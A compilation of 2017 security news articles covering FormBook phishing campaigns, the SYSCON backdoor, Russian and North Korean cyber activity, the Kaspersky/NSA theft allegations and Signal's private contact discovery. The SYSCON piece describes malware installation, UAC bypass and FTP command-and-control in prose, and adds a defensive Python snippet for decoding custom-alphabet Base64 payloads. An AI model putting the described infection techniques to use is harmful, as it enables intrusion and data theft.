The campaigns employing PDF files to distribute the malware were using FedEx and DHL shipping/package delivery themes and a document-sharing theme. The documents, however, don’t contain malicious code, but include a link to download the payload. The malicious links recorded 716 hits across 36 countries, with the U.S. being affected the most (71% of attacks).

The email campaigns distributing FormBook via DOC and XLS files were using malicious macros for delivery. As soon as the user enabled the macro, a download URL retrieved an executable file with a PDF extension. Most of the emails targeted the United States (61% of attacks), with aerospace organizations and defense contractors being hit the most.

Emails carrying archive attachments (ZIP, RAR, ACE, and ISO) accounted for the highest distribution volume and leveraged a broad range of business related subject lines, often regarding payment or purchase orders. Most of the attacks targeted organizations in South Korea (31%) and the U.S. (22%), with the manufacturing industry being impacted the most.

The security researchers also note that FormBook was observed over the past few weeks downloading other malware families such as NanoCore.

Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says that some of the analyzed post-infection traffic was identified as pertaining to the Punkey Point of Sale (POS) malware and not FormBook. The malware was distributed through RAR archives attached to fake FedEx delivery notices.

“While FormBook is not unique in either its functionality or distribution mechanisms, its relative ease of use, affordable pricing structure, and open availability make [it] an attractive option for cyber criminals of varying skill levels. The credentials and other data harvested by successful FormBook infections could be used for additional cyber-crime activities including, but not limited to: identity theft, continued phishing operations, bank fraud and extortion,” FireEye concludes.


Germany Drops Probe Into Mass NSA Surveillance
6.10.2017 securityweek BigBrothers
Prosecutors in Germany on Thursday closed an investigation into whether US and British intelligence services systematically carried out extensive spying on the country's citizens, citing a lack of hard evidence.

The inquiry was opened after revelations in 2013 by fugitive US intelligence leaker Edward Snowden that the National Security Agency (NSA) and its British partner were conducting sweeping Internet and phone data surveillance, including in Germany.

Chancellor Angela Merkel reacted angrily at the time to news that the NSA had tapped her mobile phone, telling Washington that spying between allies "is not on".

To Germany's embarrassment, news broke in 2015 that its own BND service had helped the NSA eavesdrop on EU targets including the French presidency and the European Commission.

Germany's federal prosecution service said Thursday that it had ended its inquiry into "the possible mass collection of telecommunication data of the German population by British and US intelligence services".

It said that although the services conducted "strategic signals intelligence" and tapped online communications, there was "no hard evidence" that they "illegally, systematically and massively" monitored German telecommunications and Internet traffic.

The prosecutors said their assessment was shared by Germany's BfV domestic security service, which handles counterespionage; the IT security agency BSI; the NSA parliamentary inquiry; and the operator of a major European internet hub in Germany.

They added that the "so-called Snowden documents" had documented the US spy service's "techniques and capabilities" but provided "no concrete evidence of actual espionage activities carried out by the NSA in or against Germany".


Russia Raises Tensions in Baltic Region With Testing of Cyber Weapons
6.10.2017 securityweek BigBrothers
"Russia has opened a new battlefront with NATO," claims the Wall Street Journal. "Russia may have tested cyber warfare on Latvia," says Reuters. These are two reports about two separate incidents in the Baltic area close to Russia's largest military war games since 2013: Zapad.

There are around 4,000 NATO troops in the region. Russia claims that around 13,000 Russian troops were involved in Zapad; but NATO puts the figure at 100,000.

The first incident revolves around hacking soldiers' smartphones. Two separate methodologies have been reported: the use of drones with sophisticated electronics equipment, and in an earlier incident, a mobile telephone tower (similar to law enforcement's use of stingray equipment). The sophistication of the attacks leaves little doubt that there is some state-sponsorship involved.

In the latest attack, only six smartphones are known to have been affected. According to the WSJ, one victim, U.S. Army Lt. Col. Christopher L'Heureux, "said at least six soldiers he commands have had phones or Facebook accounts hacked. He said he suspects the incidents were meant as a message that Russian intelligence forces were tracking him, could crack his passwords and wanted to intimidate his soldiers." It remains to be seen whether additional hacks surface in the coming days.

WSJ reports, "Military cyberespionage experts said the drone flights and cellphone data collection suggest Russia is trying to monitor troop levels at NATO's new bases to see if there are more forces present there than the alliance has publicly disclosed." U.S. military officials have, however, played down its significance, suggesting it is more harassment than a security risk.

The Reuters report claims, "Moscow was probably behind interruptions in Latvia's mobile communications network before Russia's war games last month, in an apparent test of its cyber attack tools, Baltic and NATO officials said, based on early intelligence of the drills." There is conjecture here. A communications jammer aimed towards the Swedish Gotland island was switched on. "One of the edges (of the beam) affected Latvia," said Karlis Serzants, the deputy chairman of the Latvian parliament's National Security Committee.

The effect of the jammer was to take out Latvia's emergency services' 112 hotline in a disruption that lasted about seven hours. This is the first time that the service has failed, and occurred on September 13, just prior to the most intensive period of the Russian Zapad war games.

While hacking smartphones would seem to be more allied to cyber-psychological warfare, disrupting telecommunications clearly has a cyberwar potential -- for both an offensive and defensive kinetic posture.

Both incidents show classic plausible deniability. While NATO might 'know' that the Russian government is behind the phone hacks, proving it to a legal certainty remains difficult. Similarly, since the jammer was not aimed at Latvia but merely caught it a glancing blow, it could be claimed to be accidental.

The fact remains, however, that Russia will have learnt much about the practical effects of the two incidents. The Baltic would appear to be the latest area for Russian offensive cyber testing, just as the Ukraine has been in recent years. U.S. Army Lieutenant General Ben Hodges, who heads U.S. Army forces in Europe, described the incidents to reporters as a sign of the progress Russia made in electronic warfare while NATO was fighting counter-insurgency campaigns in Afghanistan.

In her first official press briefing since taking office in August, Kay Bailey Hutchison (the US envoy to NATO) said, "I think it's a big concern. It has just come to light but I think it'll be an area of discussion and most certainly I know that ourselves and our allies are going to be immediately looking into it … and try to determine how it's happening and cut it off."

NATO itself has always stressed that its cyber strategy is purely defensive. This is moot: while NATO itself might not be developing offensive capabilities, its members almost certainly are. The U.S. Cyber Command, for example, recently conducted a week-long denial of service attack against the North Korean spy agency, the Reconnaissance General Bureau.

The reality is that international state cyber incidents are continuing to escalate in line with growing geopolitical tensions.


Russian firm provides North Korea with second Internet route
6.10.2017 securityaffairs BigBrothers

Dyn Research discovered traffic coming from North Korea running over the Russian TransTeleCom network; this is the regime’s second internet route.
North Korea has obtained a second Internet connection thanks to the support of a state-owned Russian firm. From the perspective of security analysts, this second connection will significantly improve North Korea’s cyber capabilities, undermining US efforts to isolate the state.

The availability of a second line allows Pyongyang to significantly improve the resilience of its infrastructure against attacks.

The Russian firm TransTeleCom is the company that activated the second connection; the first has been provided by China Unicom since at least 2010.

The discovery of the second line was reported by experts at Dyn Research that monitors global internet connectivity.

“The possibility of disconnecting North Korea from the Internet just became much more difficult,” said Bryce Boland, chief technology officer for the Asia-Pacific region at security firm FireEye.


A few weeks ago, US Cyber Command launched a massive DDoS attack against North Korea’s Reconnaissance General Bureau (RGB). The attack hit the country’s infrastructure between September 22 and September 30.

North Korean infrastructure is vulnerable to such attacks; for this reason, improving its connectivity is a priority for Pyongyang.

“As part of the campaign, U.S. Cyber Command targeted hackers in North Korea’s military spy agency, the Reconnaissance General Bureau, by barraging their computer servers with traffic that choked off Internet access.” reported The Washington Post.

“The Cyber Command operation, which was due to end Saturday, was part of the overall campaign set in motion many months ago. The effects were temporary and not destructive, officials said. Nonetheless, some North Korean hackers griped that lack of access to the Internet was interfering with their work, according to another U.S. official, who also spoke on the condition of anonymity to discuss a secret operation.”

North Korea is considered one of the most dangerous states in cyberspace due to its aggressive conduct. It has a cyber army of 6,800 cyber soldiers that have already been involved in operations against targets worldwide, including the Sony hack.

This isn’t the first time North Korean infrastructure has been targeted by foreign hackers: it already happened shortly after the Sony attack, and that attack was believed to be a US retaliation.


Experts discovered a SYSCON Backdoor using FTP Server as C&C
6.10.2017 securityaffairs BigBrothers

Security researchers with Trend Micro discovered a backdoor dubbed SYSCON that uses an FTP server for command and control (C&C) purposes.
The SYSCON backdoor is spreading through tainted documents that refer to North Korea and target individuals connected to the Red Cross and the World Health Organization.


The use of an FTP server as C&C is uncommon for a botnet because the associated traffic is not difficult to monitor.

“Using an FTP server has some advantages. It is less common, and this fact may allow it to slip unnoticed by administrators and researchers. However, this also leaves the C&C traffic open for monitoring by others, including security researchers. In addition, thanks to a coding mistake by the attackers, this particular backdoor does not always run the right commands.” states the analysis published by Trend Micro.

The experts noticed that the weaponized documents used to spread the threat contain two long strings, with Base64 encoding using a custom alphabet, a technique that was used to deliver the Sanny malware back in 2012.

“Its similarities with the earlier Sanny attack are interesting. Both attacks used relatively unusual techniques for their C&C server, their structure is similar, and the encoding key is identical. Documents somehow tied to North Korea were also used. We cannot eliminate the possibility that both Sanny and this new malware family were the work of the same threat actor.” continues the analysis.

The Base64 strings are cabinet files that contain the 32-bit and 64-bit versions of the malicious code. When the victim opens the file, the cabinet file appropriate to the OS version is extracted into the %Temp% folder.
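As an added example for analysts (not Trend Micro’s code), here is how a document’s custom-alphabet Base64 strings can be decoded and checked for the cabinet file signature; the alphabet and the embedded sample payload are constructed for illustration, since the article does not give the real ones.

```python
import base64
import binascii
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed custom alphabet for this example: the standard table rotated by
# 13 positions. The real SYSCON/Sanny alphabet is not given in the article.
CUSTOM_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]

CAB_MAGIC = b"MSCF"  # first four bytes of a Microsoft Cabinet file


def custom_b64encode(data, alphabet=CUSTOM_ALPHABET):
    """Encode with the custom alphabet; used here only to build the sample."""
    std = base64.b64encode(data).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def custom_b64decode(text, alphabet=CUSTOM_ALPHABET):
    """Translate the custom alphabet back to the standard one, then decode."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must contain exactly 64 distinct characters")
    # Drop whitespace and line breaks that document extraction often inserts.
    cleaned = "".join(text.split())
    std = cleaned.translate(str.maketrans(alphabet, STD_ALPHABET))
    std += "=" * (-len(std) % 4)  # restore padding if the author stripped it
    return base64.b64decode(std, validate=True)


def looks_like_cabinet(blob):
    """True if the decoded bytes start with the cabinet magic."""
    return blob[:4] == CAB_MAGIC


def extract_cabinet(text, alphabet=CUSTOM_ALPHABET):
    """Return the decoded bytes if they form a cabinet file, otherwise None."""
    try:
        blob = custom_b64decode(text, alphabet)
    except (ValueError, binascii.Error):
        return None
    return blob if looks_like_cabinet(blob) else None


# Constructed stand-in for an embedded payload: a cabinet header with the MSCF
# magic, four reserved zero bytes, a little-endian size field, and filler.
FAKE_CAB = (CAB_MAGIC + b"\x00" * 4 + (0x1000).to_bytes(4, "little")
            + b"\x00" * 24 + b"PAYLOAD")
SAMPLE_STRING = custom_b64encode(FAKE_CAB)

if __name__ == "__main__":
    blob = extract_cabinet(SAMPLE_STRING)
    print("cabinet recovered" if blob else "no cabinet found")
```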

The file determines the operating system version and either executes a BAT file or injects a DLL into the taskhost(ex) process to execute the BAT without triggering a UAC prompt.

The Install.bat copies the main malware ipnet.dll and the configuration file ipnet.ini into %Windows%\System32, configures a new malicious COMSysApp service using the sc command line utility, adds the service parameters to the registry, starts the malicious service, and deletes all previously created files in the %Temp% directory.

The SYSCON malware uses the computer name as an identifier, then logs into the FTP server using credentials stored in the configuration file.

The researchers discovered a URL for the byethost free FTP service provider by decoding the configuration file.

On the server side, the commands are stored in .txt files. Every time a bot processes a command, the malicious code lists all currently running processes, then sends zipped and encoded data to the server.

The list of supported commands includes copy file to temp.ini, pack it to temp.zip, encode and upload; pack file to temp.zip, encode and upload; delete config file, write string to the new config file; put file to the given path on infected system; execute command but don’t report back; and execute downloaded file.

Malware researchers noticed that the authors of the threat made a coding mistake that sometimes causes the backdoor to execute the wrong commands.

The researchers found a typo in the command processing loop: while the malware treats the commands as strings in wide character format, a parameter in one of the functions has an incorrect file name, which prevents the process from executing.

IT administrators should monitor any connection to external FTP servers, since they can be used not just for data exfiltration but for C&C activity as well.


Russian spies pilfered data from NSA Contractor’s home PC running a Kaspersky AV
6.10.2017 securityaffairs BigBrothers

Russian hackers allegedly exploited Kaspersky AV to hack into an NSA contractor’s PC and steal NSA exploit code. This complicates Kaspersky’s position.
Anonymous sources have claimed Russian intelligence extracted NSA exploits from a US government contractor’s home PC using Kaspersky Lab software.

Sources told the Wall Street Journal that malicious code allowed cyber spies to exfiltrate classified code, documentation and other sensitive data. It is alleged that Kremlin hackers exploited the security package in one way or another to identify those sensitive files and exfiltrate them.

“Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.” states the Wall Street Journal.

“The hackers appear to have targeted the contractor after identifying the files through the contractor’s use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said.”

The security breach occurred in 2015, but it was discovered earlier this year. Experts speculate the stolen NSA exploit code and classified documents could be compared with code included in the Shadow Brokers dump that dates back to 2013.

According to the sources, the Kaspersky antivirus discovered the NSA exploit while scanning the machine. Once it detected the malicious software, the antivirus sent it back to a cloud service for inspection; it is in this phase that Russian intelligence allegedly exploited the software to establish a backdoor on the PC.

The WSJ’s sources don’t clarify the role of the Kaspersky firm in the cyber theft; it is unclear whether it helped the Russian spies or whether the hackers exploited flaws in Kaspersky software to exfiltrate the exposed documents.

Another possibility is that, under Russian law, the Russian Government forced the Kaspersky personnel to hack into the computer containing the NSA code and exfiltrate it.

Kaspersky Lab was the company that first spotted malware used by the NSA-linked Equation Group and it is likely that the Russian intelligence exploited this knowledge for espionage purposes.


Kaspersky Lab promptly denied any involvement; below is the official statement published by the company.

“Kaspersky Lab has not been provided any evidence substantiating the company’s involvement in the alleged incident reported by the Wall Street Journal on October 5, 2017, and it is unfortunate that news coverage of unproven claims continue to perpetuate accusations about the company.

“As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight.

“We make no apologies for being aggressive in the battle against malware and cybercriminals. The company actively detects and mitigates malware infections, regardless of the source, and we have been proudly doing so for 20 years, which has led to continuous top ratings in independent malware detection tests. It’s also important to note that Kaspersky Lab products adhere to the cybersecurity industry’s strict standards and have similar levels of access and privileges to the systems they protect as any other popular security vendor in the U.S. and around the world.” – Attributable to Kaspersky Lab.

Eugene Kaspersky @e_kaspersky
New conspiracy theory, anon sources media story coming. Note we make no apologies for being aggressive in the battle against cyberthreats

4:25 PM - Oct 5, 2017

Since the US government banned Kaspersky products from federal computers in September, Kaspersky has repeatedly offered up the source code of its products for officials to review.

“It’s a lot harder to beat your opponent when they’re reading your playbook, and it’s even worse when someone on your team gives it to them. If these reports are true, Russia has pulled that off,” said U.S. Senator Ben Sasse, a member of the Senate Armed Services Committee.

“The men and women of the US Intelligence Community are patriots; but, the NSA needs to get its head out of the sand and solve its contractor problem. Russia is a clear adversary in cyberspace and we can’t afford these self-inflicted injuries.”


Senator Ben Sasse @SenSasse
Russia is a clear adversary in cyberspace and we can’t afford these self-inflicted injuries. https://www.sasse.senate.gov/public/index.cfm/press-releases?ID=B97F3D92-A6C1-48D8-935E-1F822754F164 …

7:51 PM - Oct 5, 2017

The Kaspersky antivirus may have detected NSA malware being used in the wild, and intentionally or not have provided the Russian cyberspies the backdoor to steal the precious code.

Frankly, I’m disconcerted by the way such code is managed by US intelligence: it was stolen from a personal PC running Kaspersky antivirus. Is this the best way to safeguard a hacking tool?

Senator Jeanne Shaheen (D-NH) also condemned the company and urged strong action against it.

“The strong ties between Kaspersky and the Kremlin are extremely alarming and have been well documented for some time,” she said today. “It’s astounding and deeply concerning that the Russian government continues to have this tool at their disposal to harm the United States.” reads Shaheen’s statement.


North Korea Gets Second Web Connection Via Russian Firm
5.10.2017 securityweek BigBrothers
A state-owned Russian company has opened up a second internet connection for North Korea which could strengthen Pyongyang's cyber capabilities and undermine US efforts to isolate the regime, security experts said.

The activation of the new line from TransTeleCom was first detected Sunday by analysts at Dyn Research, which monitors global internet connectivity.

The new connection supplements the existing link provided by China Unicom, which has almost exclusively routed North Korean internet traffic since 2010.

The additional line gives Pyongyang "significantly more resilience against attacks on their network infrastructure," said Bryce Boland, the chief technology officer in the Asia-Pacific for cybersecurity firm FireEye.

The Washington Post reported earlier that the US Cyber Command had carried out attacks against hackers in North Korea aimed at cutting off their access to the Internet.

The operation ended Saturday, the report said.

North Korea has a 6,800-strong unit of trained cyberwarfare specialists, according to Seoul's defence ministry, and has been accused of launching high-profile cyberattacks including the 2014 hacking of Sony Pictures.

Related: U.S. Cyber Command Launched DDoS Attack Against N. Korea: Report

But with only one internet provider to rely on, the regime has often found itself vulnerable to external cyberattacks against its own network infrastructure.

North Korea suffered several internet connection failures -- some which lasted for hours -- shortly after the Sony attack, which many suspected to be a US retaliation.

With the alternate route from Russia, "the possibility of disconnecting North Korea from the Internet just became much more difficult," Boland said.


Spanish Court Agrees to Extradite Russian Hacking Suspect to US
4.10.2017 securityweek BigBrothers
Spain's High Court said Tuesday it had agreed to a US request to extradite a Russian man accused of controlling one of the world's top generators of spam and online extortion.

Peter Levashov from Saint Petersburg, a 37-year-old who goes by a string of names, was arrested at Barcelona airport on April 7 by Spanish authorities acting on a US warrant.

US prosecutors accuse the purported hacker of controlling the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransoms.

His defense team had argued that the US extradition demand was "politically motivated".

Levashov, a computer specialist, had served in the Russian army and worked for President Vladimir Putin's United Russia party, according to his lawyers.

In the course of his work he had access to confidential documents which he fears authorities in the US may demand he turn over to them if he is extradited there, the lawyers had argued.

But the High Court said in its ruling that "none of the allegations relating to the political motivation" for the extradition request "has been accepted".

Levashov has three days to appeal the court's decision.

A US federal grand jury in April returned an eight-count indictment against Levashov. The charges include fraud, identity theft and conspiracy.

Levashov could allegedly remotely direct the delivery of fraudulent spam and malware on behalf of whoever paid him to do so.

US officials claim he was proud of his work and advertised the ever-improving effectiveness of his spam services with a standard price list. For legal ads, he charged $200 per million spam emails. For illegal scams and phishing attacks, it was $500 per million.

To help someone with a stock manipulation, he allegedly wanted a deposit of $5,000-$10,000 to share his list of 25 million traders. He also demanded five percent of the gains made on the stock.

During any 24-hour period, prosecutors say the botnet generated and distributed more than 2,500 unsolicited spam emails that advertised various criminal schemes.

Levashov has not been tied to Russian interference in last year's US presidential election.

But the hackers who penetrated the computers of the Democratic Party to steal data relied on spam emails, exactly the kind of botnet service he allegedly sold to criminals.


US Reviewing Better Tech Identifiers After Hacks: Trump Aide
3.10.2017 securityweek BigBrothers
US officials are studying ways to end the use of social security numbers for identification following a series of data breaches compromising the data for millions of Americans, a Trump administration official said Tuesday.

Rob Joyce, the White House cybersecurity coordinator, told a forum at the Washington Post that officials were studying ways to use "modern cryptographic identifiers" to replace social security numbers.

Joyce's comments come after news that some 145 million Americans may have had personal information leaked, including the important social security numbers, in a breach at Equifax, one of three big US firms which collect data for credit applications.

"I feel very strongly that the social security number has outlived its usefulness," Joyce said.

"It's a flawed system."

For years, social security numbers have been used by Americans to open bank accounts or establish their identity when applying for credit. But stolen social security numbers can be used by criminals to open bogus accounts or for other types of identity theft.

"If you think about it, every time we use the social security number we put it at risk," Joyce said.

"That is the identifier that connects you to all sort of credit and digital and information online."

He said the administration has asked officials from several agencies to come up with ideas for "a better system" which may involve cryptography.

This may involve "a public and private key," including "something that could be revoked if it has been compromised," Joyce added.

The official spoke as US lawmakers opened hearings on the Equifax breach, believed to be one of the worst because of the sensitivity of data leaked.

Former Equifax chief executive Richard Smith told a congressional panel that the breach stemmed from both human and technological error, while offering a fresh apology to consumers affected.


U.S. Cyber Command Launched DDoS Attack Against North Korea: Report
2.10.2017 securityweek BigBrothers
Non-destructive Cyber Attack Could be Considered a Warning to North Korean Regime

The United States Cyber Command has reportedly been engaged in offensive activity, namely a DDoS attack, against North Korea's military spy agency, the Reconnaissance General Bureau (RGB). The attack is thought to have commenced on September 22, and continued until September 30.

The attack occurred just five weeks after President Trump elevated U.S. Cyber Command to a Unified Combatant Command. At the time, Trump said, "The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries. Through United States Cyber Command, we will tackle our cyberspace challenges in coordination with like-minded allies and partners as we strive to respond rapidly to evolving cyberspace security threats and opportunities globally."

The few details currently available on this DDoS attack come from a Washington Post report published Saturday. The report says that the Reconnaissance General Bureau was targeted, "by barraging their computer servers with traffic that choked off Internet access." The effects were temporary and non-destructive. "Nonetheless, some North Korean hackers griped that lack of access to the Internet was interfering with their work, according to another [anonymous] U.S. official."

The action seems to be partly in response to North Korean cyberattacks, and partly an aspect of a wide-ranging diplomatic offensive led by Secretary of State Rex Tillerson, who was in Beijing on Saturday. "What I can tell you," said a senior administration official to the Washington Post, "is that North Korea has itself been guilty of cyberattacks, and we are going to take appropriate measures to defend our networks and systems."

That this cyber attack was non-destructive and temporary suggests it could be considered more as a warning than a punishment. It is Cyber Command telling North Korea that it has its range and is capable of much stronger action. By being non-destructive it is probably hoped that it won't provoke kinetic retaliation; although it is quite likely to provoke cyber retaliation from North Korean hacking groups.

In July 2017, researchers from Recorded Future monitored internet traffic from North Korea. One of its conclusions was that "most state-sponsored activity is perpetrated from abroad." Recorded Future suggested that North Korean malicious activity most likely originates from countries such as India, Malaysia, New Zealand, Nepal, Kenya, Mozambique, and Indonesia. Under these circumstances, it is unlikely that DDoSing the homeland would have much effect on the actual hackers; although it would disrupt coordinating control from the RGB.

"DDoSing the Reconnaissance General Bureau might not affect the hackers outside of North Korea directly," F-Secure's security adviser Sean Sullivan told SecurityWeek, "but it could possibly hamper communications, forcing them to use other (potentially monitored?) channels."

His colleague, Tom Van de Wiele, agreed and added, "Or as an extra bonus, to see what procedures they would go for versus what kind of panicky moves the organization makes, that [Cyber Command] could later abuse, monitor or exploit." The suggestion here is that it wasn't just a warning shot to North Korea, but an elaborate cyber reconnaissance project.

One thing not yet known is whether China had any involvement or collusion in the action. Since Tillerson was in Beijing at the time, and since all internet traffic into and out of North Korea is through China via a China Unicom link operating since 2010, it is a tempting thought. Either way, however, this potential choke point against North Korean cyber access is in the process of weakening.

Russia, on Sunday, started providing a second internet route for North Korea. The link started showing in Dyn Research's peering observation tables at around 0900 UTC on October 1. Connectivity was clearly unstable for about three hours, but stabilized after that. In effect, a stable link between Russia and North Korea went live shortly after the U.S. Cyber Command action finished.

The route is supplied by Russian telecommunications company TransTeleCom. TransTeleCom is a subsidiary of the Russian railway operator, and lays its fiber optic lines alongside the railway tracks. A map on the company website shows a cable running to the North Korean border. It is assumed that this cable now connects Russia and North Korea via the Friendship Bridge across the Tumen River -- the only point at which the two countries connect.

Satellite: Russia and North Korea

The cabling has apparently been in place under an agreement between TransTeleCom and Korea Posts and Telecommunications Corp since 2009. The timing coincidence of it becoming live now could imply that opening the link between the two countries is in response to the U.S. Cyber Command attack. Alternatively, it could lend weight to the F-Secure hypothesis. If Cyber Command was aware that this would be happening, the DDoS attack could have been an attempt to provoke the Reconnaissance General Bureau into revealing channels to its overseas hacking groups prior to the Russian link giving North Korea additional communications options.


Senate Passes MAIN STREET Cybersecurity Act for Small Business
29.9.2017 securityweek BigBrothers
The U.S. Senate has passed the MAIN STREET Cybersecurity Act on Sept. 28, which will require NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral and implementable using commercial off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for business. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 2018.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.


Signal announces private contact discovery to improve users’ privacy
29.9.2017 securityaffairs BigBrothers

Open Whisper Systems announced that it’s working on a new private contact discovery service for its popular communications app Signal.
Signal is widely considered the most secure instant messaging app; search for it on the Internet and you will find Edward Snowden’s endorsement:

“Use anything by Open Whisper Systems,” Snowden says.

Cryptographer Matt Green, a professor at Johns Hopkins University, and security expert Bruce Schneier are two other admirers of the Signal app.

Signal was also approved by the U.S. Senate for official communications among staff members.

Open Whisper Systems aims to improve the contact discovery feature. Currently, when a user signs up for Signal, the phone numbers in their device’s address book are compared with entries in a database on Open Whisper Systems servers to determine which contacts use Signal.

The comparison uses truncated SHA256 hashes of the phone numbers, but the space of valid phone numbers is small enough to enumerate, so anyone holding the hashes can recompute them for every candidate number and recover the numbers.

Even if Open Whisper Systems does not log contact discovery requests, a persistent attacker (e.g. an APT group) who compromised the Signal servers could modify the code and start logging these requests.

Signal developers are working to close this attack scenario by leveraging Intel’s Software Guard Extensions (SGX) technology, supported by modern Intel chips.

The SGX technology allows developers to protect a certain portion of code and data from disclosure or modifications. The code is placed in a secure memory area of execution dubbed “enclave.”

“Modern Intel chips support a feature called Software Guard Extensions (SGX). SGX allows applications to provision a “secure enclave” that is isolated from the host operating system and kernel, similar to technologies like ARM’s TrustZone. SGX enclaves also support a feature called remote attestation. Remote attestation provides a cryptographic guarantee of the code that is running in a remote enclave over a network.” states Open Whisper Systems.

The idea of the Signal development team is to run contact discovery service in an SGX enclave.

The private contact discovery leveraging the SGX technology could be composed of the following steps at a high level:

Run a contact discovery service in a secure SGX enclave.
Clients that wish to perform contact discovery negotiate a secure connection over the network all the way through the remote OS to the enclave.
Clients perform remote attestation to ensure that the code which is running in the enclave is the same as the expected published open source code.
Clients transmit the encrypted identifiers from their address book to the enclave.
The enclave looks up a client’s contacts in the set of all registered users and encrypts the results back to the client.
SGX also supports “remote attestation”, which allows the client to verify, over the network, which code is running in a remote enclave.

Signal app

“This would allow a server to stream media content to a client enclave with the assurance that the client software requesting the media is the “authentic” software that will play the media only once, instead of custom software that reverse engineered the network API call and will publish the media as a torrent instead.” continues Open Whisper Systems.

“Since the enclave attests to the software that’s running remotely, and since the remote server and OS have no visibility into the enclave, the service learns nothing about the contents of the client request. It’s almost as if the client is executing the query locally on the client device.”

Open Whisper Systems plans to integrate the feature in the next few months.

If you are interested in analyzing source code for the private contact discovery service you can visit the official GitHub repository.


Signal Announces Private Contact Discovery
28.9.2017 securityweek BigBrothers
Open Whisper Systems announced this week that it’s working on a new private contact discovery service for its privacy-focused communications app Signal.

Signal has become highly popular with individuals who value their privacy, and it was recently approved even by the U.S. Senate for official use by staff members.

While communications through Signal are protected against both hackers and government snooping, there is one feature that can still be improved from a privacy standpoint, namely contact discovery.

Currently, when a user signs up for Signal, the phone numbers in their device’s address book are compared with entries in a database on Open Whisper Systems servers to determine which contacts use the messaging app. While the verification relies on truncated SHA256 hashes of the phone numbers rather than cleartext data, these hashes can in most cases be cracked, because the set of possible phone numbers is small enough to enumerate.

In theory, this should not be a problem as Open Whisper Systems does not log contact discovery requests and makes the Signal source code publicly available in order to prove it. However, there is always the possibility that someone – including hackers or a government agency – modifies the code on Signal servers and starts logging contact discovery requests.

In order to prevent this, Signal developers have been trying to find a way to implement truly private contact discovery. The solution seems to lie in Intel’s Software Guard Extensions (SGX) technology.

Intel SGX allows application developers to protect certain pieces of code and data from disclosure or modifications by placing them in a secure area of execution in the memory called an “enclave.”

Signal developers have been working on running a contact discovery service in such an SGX enclave. When the client performs contact discovery, encrypted identifiers from the address book are transmitted over a secure connection directly to the enclave running the discovery service. The service looks up the contact information in the database of registered users and the results are sent back to the client in an encrypted form.

Another important security feature provided by SGX is that it supports what is called “remote attestation.” Remote attestation allows the client to ensure that the code running in the enclave is as expected – in Signal’s case, it ensures that the code from the enclave is the same as the source code made public by Open Whisper Systems.

